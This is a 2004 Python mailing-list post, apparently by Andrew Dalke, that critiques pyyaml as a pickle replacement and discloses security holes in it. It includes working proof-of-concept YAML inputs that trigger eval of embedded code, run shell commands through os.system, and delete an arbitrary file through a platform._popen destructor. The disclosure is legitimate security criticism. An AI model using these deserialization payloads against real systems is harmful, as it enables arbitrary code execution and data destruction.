
adalke at mindspring
Sep 19, 2004, 11:24 PM
Views: 4551
Permalink
|
[.Long post. Summary is I've found three exploits in pyyaml and at least five limitations w.r.t. the existing Python pickles. I DO NOT recommend anyone use pyyaml when the input comes from untrusted code. REPEAT: pyyaml allows ARBITRARY CODE TO BE EXECUTED.] Me: >> Here's a test. Can you do the following in YAML and do >> so securely? (Untested code.) Chris S. wrote: > Conceptually, yes. That code would work fine with a full YAML > implementation. Admittedly, the current pure-Python implementation is > not yet complete. I didn't mean to imply that the current YAML > implementations were drop-in replacements for Pickle, only that the > concept of YAML is deserving of more attention. This original thread started with you asking: > Is there any benefit to Pickle over YAML? You have since distinguished between two YAMLs, the conceptual one and the concrete one. If it's the latter then the answer we've made several times is that YAML as currently implemented is not able to replace pickle. You here agree with us. Let's suppose YAML-the-concept was implemented. That's going to call for a lot of work so that the implementation meets the concept, and well beyond what's been done so far. For example, to be a viable pickle replacement will require a C implementation because the performance is important. The pure Python version "pickle.py" wasn't fast enough so Someone (Jim Fulton, as I recall) contributed cPickle. You'll also need a non-recursive implementation. Here's a test with the pyyaml version I just got from svn using a very deep data structure. It hits Python's recursion limit: >>> x = () >>> for i in range(600): ... x = (x,) ... >>> import yaml >>> import cPickle >>> yaml.dump(x) Traceback (most recent call last): File "<stdin>", line 1, in ? File "yaml/dump.py", line 18, in dump return Dumper().dump(*data) File "yaml/dump.py", line 43, in dump self.dumpDocuments(data) File "yaml/dump.py", line 61, in dumpDocuments self.dumpData(obj) File "yaml/dump.py", line 90, in dumpData ..... self.dumpList(data) File "yaml/dump.py", line 138, in dumpList self.indentDump(item) File "yaml/dump.py", line 67, in indentDump self.dumpData(data) RuntimeError: maximum recursion depth exceeded >>> cPickle.dumps(x) '((((((( ... many characters deleted ...tp331\ntp332\ntp333\n.' >>> It doesn't handle tuples, only lists >>> print yaml.load(yaml.dump( (1,2,3) )).next() [1, 2, 3] >>> I see it doesn't handle Unicode correctly. Here it doesn't round-trip a Unicode character back to Unicode. >>> s = unicode("\xfe", "latin1") >>> s u'\xfe' >>> print s.encode("utf8") # Should be a thorn character þ >>> x= iter(yaml.load(yaml.dump(s))).next() >>> x '\xfe' >>> Digging deeper into the YAML implementation I see it really doesn't handle Unicode correctly -- there's even a *MAJOR* security hole. Watch this. I'll start with a hand-crafted YAML file and read it. % cat test.yaml --- "\u000a"+' '.join(__import__('os').listdir('.')) + "" % python Python 2.4a2 (#1, Aug 29 2004, 22:30:12) [GCC 3.3 20030304 (Apple Computer, Inc. build 1495)] on darwin Type "help", "copyright", "credits" or "license" for more information. >>> import yaml >>> yaml.loadFile("test.yaml") <yaml.load.Parser instance at 0x69a58> >>> _.next() u'\n.svn assets docs examples experimental patches README scripts setup.py test.yaml TESTING yaml' >>> See how it eval'ed the embedded and artibrary Python code in the string it thought was Unicode? That's because the code in implicit.py doesn't fully verify the string before eval'ing it, in if val[0] == '"' and val[-1] == '"': if re.search(r"\u", val): val = "u" + val unescapedStr = eval (val) This code is also suspect, from klass.py def makeClass(module, classname, dict): exec('import %s' % (module)) klass = eval('%s.%s' % (module, classname)) obj = new.instance(klass) if hasMethod(obj, 'from_yaml'): return obj.from_yaml(dict) obj.__dict__ = dict return obj Yep, here's an exploit against it. The chr(32) is needed because there's some sort of split on space upstream so I can't embed spaces directly. But I can construct them so this shows that I can pass arbitrary commands to the shell. (Note: the s= ... assignment is all on one line.) >>> s = """--- !!os;os.system("ls"+chr(32)+"-l"+chr(32)+"/");1.2 {}\n\n""" >>> import yaml >>> yaml.load(s).next() total 326905 drwxrwxr-x 51 root admin 1734 12 Sep 19:16 Applications drwxrwxr-x 21 root admin 714 21 Jun 2003 Applications (Mac OS 9) lrwxr-xr-x 1 root admin 15 17 Feb 2003 Desktop (Mac OS 9) rebuild ... many lines delete ... drwxr-xr-x 12 root wheel 408 12 Sep 2003 usr lrwxr-xr-x 1 root admin 11 14 Feb 2004 var -> private/var Traceback (most recent call last): File "<stdin>", line 1, in ? File "yaml/load.py", line 83, in next return self.parse_value(indicator) File "yaml/load.py", line 168, in parse_value value = self.parse_unaliased_value(value) File "yaml/load.py", line 179, in parse_unaliased_value return self.typeResolver.resolveType(value, url) File "yaml/klass.py", line 12, in resolveType return makeClass(moduleName, className, data) File "yaml/klass.py", line 16, in makeClass klass = eval('%s.%s' % (module, classname)) File "<string>", line 1 os;os.system("ls"+chr(32)+"-l"+chr(32)+"/");1.2 ^ SyntaxError: invalid syntax >>> Note that I was able to generate the os.system call before the SyntaxError. Here's another exploit. It's a variation of the "delete an arbitrary file" example I posted that you replied could be made secure "conceptually". It works because the platform._popen class deletes the temporary file on __del__. [Andrew-Dalkes-Computer:~/cvses/pyyaml/trunk] dalke% cat rmfile.yaml --- !!platform._popen bufsize: ~ mode: r pipe: ~ tmpfile: delete_this_file.txt % ls -l delete_this_file.txt -rw-r--r-- 1 dalke staff 28 19 Sep 23:00 delete_this_file.txt % python Python 2.4a2 (#1, Aug 29 2004, 22:30:12) [GCC 3.3 20030304 (Apple Computer, Inc. build 1495)] on darwin Type "help", "copyright", "credits" or "license" for more information. >>> import yaml >>> yaml.loadFile("rmfile.yaml").next() <platform._popen instance at 0x8b940> >>> ^D % ls -l delete_this_file.txt ls: delete_this_file.txt: No such file or directory % Oh, and I already mentioned that you need support for __slots__. It also looks like pyyaml doesn't support classes derived from builtins, as in >>> class MyList(list): ... def blah(self): print "blah blah" ... >>> x=MyList([1,3,5]) >>> x [1, 3, 5] >>> x.blah() blah blah >>> print yaml.dump(x) --- [1, 3, 5] >>> yaml.load(yaml.dump(x)).next() [1, 3, 5] >>> yaml.load(yaml.dump(x)).next().blah() Traceback (most recent call last): File "<stdin>", line 1, in ? AttributeError: 'list' object has no attribute 'blah' >>> Because YAML the implementation is so far from YAML the concept, and YAML the implementation is at least as insecure as pickle, why should we look at YAML any further? In fact, I wouldn't even use pyyaml now for any of my projects knowing just how insecure it is. > Given that Pickle is insecure, wouldn't it make > more sense to support a secure serialization format, > one that's even readable to boot, such as YAML? Again, please tell me how you can have a "secure serialization format" which prevents my "__del__ calls os.unlink on arbitrary filename" attack. You've said it's possible in the abstract. The only way I know is to register the classes that are safe to deserialize. But pickles already allow that. So how would YAML-the-conceptual be any more secure than pickles as they've existed for years? And how long would it be until YAML-the-implementation hopes to be comparable to pickles for both speed and security? For that matter, why doesn't pyyaml use the existing protocol in Python to ask an instance for how to serialize itself? Why does it need to define a new one? Finally, you said > the concept of YAML is deserving of more attention. What is the concept? Why is it more deserving than, say, XML-RPC encoding, or SOAP's, or CORBA's serialization, or David Mertz' xml_pickle, or Twisted's jelly, or any of a dozen other serializations? - it's not as fast, nor as small as a binary pickle done with cPickle - it doesn't understand tuples vs. lists - it doesn't have the buzz of XML (and XML advocates also claim readability) - it doesn't have jelly's upversioning support (when I looked at it, Twisted allowed classes to describe how to upgrade older pickles to conform with changes in the class) - it doesn't have the validation tools that CORBA has to ensure that received data fields are at least the correct types Some are limitations of the implementation, but the bar is pretty high so it's up to the advocates (and of the years YAML's been about you're the first I've seen) to prove it's deserving. Andrew dalke [at] dalkescientific -- http://mail.python.org/mailman/listinfo/python-list
|